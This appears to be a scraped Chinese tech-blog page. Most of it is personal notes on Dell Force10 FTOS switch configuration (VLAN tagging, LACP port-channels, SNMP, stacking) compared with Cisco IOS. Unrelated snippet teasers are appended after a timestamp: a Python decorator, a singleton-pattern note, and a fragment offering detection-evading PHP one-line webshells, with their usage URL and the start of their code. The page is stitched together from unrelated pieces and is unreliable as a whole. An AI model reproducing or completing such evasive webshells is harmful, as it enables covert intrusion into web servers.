


console#upgrade system ftp: A:
Address or name of remote host []:
Source file name []: FTOS-SC-
User name to login remote host: dell
Password to login remote host:
01:59:11: %STKUNIT0-M:CP %FTP-3-FTP_ERROR: File not found
% Error: Failed to access the remote file.
% Error: Upgrade system image failed.
console#upgrade system ftp: A:
Address or name of remote host []:
Source file name []: FTOS-SC-
User name to login remote host: dell
Password to login remote host:


show version
show system stack-unit 0
show system brief

    enable password
    username password
        no ip telnet server enable    关闭telnet
        ip ssh server enable

Spanning tree
        protocol spanning-tree rstp/mstp/stp/pvst
            no disable               打开模式

Show 命令

show spanning-tree rstp
        show spanning-tree rstp interface gi0/0

        interface vlan 100
    Access/Trunk/Native vlan

CiscoAccess: interface g0/0
        sw mo ac
        sw ac vlan 100
        no sh

FTOSAccess:    interface vlan 100
        untagged interface g0/0

CiscoTrunk:   interface gi0/1
        sw trunk encapsulation dot1q
        sw mo trunk
        sw trunk all vlan 100 , 120
        no sh

FTOSTrunk : interface vlan 100 , vlan 120
        tagged gi0/1

    show vlan
    show interface switchport gi0/1

    No switchport


1. Static
        interface port-channel 10
            channel-member gi0/10-11
        interface GigabitEthernet 0/12
             no ip address
             port-channel-protocol LACP
              port-channel 11 mode active
             no shutdown

Show 命令
        show interface status
        show ip inter bri
        show inter port-channel 11 bri
        show interface gi0/11 bri


Stack-unit 0 stack-group 14
    (注:只有S4810/6000 - SZ9000 Arc才能需要打上面这命令堆叠)



snmp-server community [email protected] ro
snmp-server contact FS4810s-07-08
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snmp-server user [email protected] [email protected] 1
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snmp-server user [email protected] [email protected] 3

        Show command-history    显示之前配过的命令
        Show command

        Interface Range Marco
            Define interface-range macro(name)
            Interface port-channel 31
                Channel-member {interface}
                Minimum-linkes 3        在最小3个up情况下,Port-channel才up
            Interface G0/12
                Port-channel-protocol lacp
                Port-channel 32 mode active
            Interface port-channel 32
                No shutdown
            You can‘t simply put a port into trunk mode as you do in IOS, you have
            to define all the VLANs that you want to carry on that port.
            For an access port you do:
            int g0/6
            int vlan 123
            untagged g0/6
            For a trunk port you go:
            int g0/6
            int vlan 123
            tagged g0/6
            int vlan 124
            tagged g0/6
        Native Vlan
            interface vlan 10
            untagged gigabitethernet 1/0
            interface vlan 20
            tagged gigabitethernet 1/0
            interface vlan 30
            tagged gigabitethernet 1/0
            In this case You use the vlan 10 like nativ vlan in ge1/0 and vlan 20
            and 30 like taged vlan with dot1q encapsulation. So you need define the
            needed vlan on all interface. Not like cisco ( permit all vlan in default :)
            But you need use the "portmode hybrid" command on ge1/0 if you like use
            nativ and tagged vlan on the interface same time.
            On port-channel interface you can‘t use the "portmode hybrid" command !
            In the IOS:
            interface gigabithetnernet 1/0
            switchport mode trunk
            switchport trunk encapsulation dot1q
            switchport trunk native vlan 10
            switchport trunk allowed vlan 20,30

For Example:
            Force10(conf-if-gi-0/1)#Int g0/1
            Force10(conf-if-gi-0/1)#Portmode hybrid
            Force10(conf)#Int vlan 10
            Force10(conf-if-vl-10)#Untagged g1/0
            Force10(conf)#Int vlan 20
            Force10(conf-if-vl-20)#Tagged g1/0
            Force10(conf)#Int vlan 30
            Force10(conf-if-vl-30)#Tagged g1/0
            Just like Cisco IOS
            CiscoSW(config)#interface g0/1/0
            CiscoSW(config-if)#Switchport trunk encapuslation dot1q
            CiscoSW(config-if)#Swtichport mode trunk
            CiscoSW(config-if)#Switchport trunk native vlan 10
            CiscoSW(config-if)#Switchport trunk allowd vlan 20,30

5548堆叠unit号,需要手动绑定。switch 1 renumber 1

查看堆叠sh swi


时间: 2024-08-11 00:51:07


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cán,意思是指说大话而毫不感到难为情.出自<论语·宪问>:“子曰:‘其言之不怍,则为之也难.’”宋·朱熹注:“大言不惭,则无必为之志,而不自度其能否也.欲践其言,其不难哉!” 是不是类似于  swank? 原文地址:


装饰器: def auth(func):     def wrapper(name):                     如果函数带参数,要加在这里         user=raw_input("input passwd:").strip()         if user=='test':             print "welcome login"             func(name)              如果函数带参数,要加在这里


分享些不需要动态函数.不用eval.不含敏感函数.免杀免拦截的一句话.(少部分一句话需要php5.4.8+.或sqlite/pdo/yaml/memcached扩展等) 原理: 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 01 $e = $_REQUEST['e'];$arr = array($_PO


单例模式是软件开发中非常普遍的一种模式.它的主要作用是确保系统中,始终只存在一个类的实例对象. 这样做的好处有两点: 1.对于需要频繁使用的对象,在每次使用时,如果都需要重新创建,并且这些对象的内容都是一样的.则不但提高了jvm的性能开销(堆中开辟新地址,同时降低GC效率等),同时还会降低代码的运行效率.倘若始终在堆中只存在唯一的一个实例对象.任何方法在使用时,均直接访问这个实例对象,则大大提高了系统的运行效率. 2.可以更好的维护对象,倘若系统中存在多个相同的实例对象,而一旦这些实例对象的属性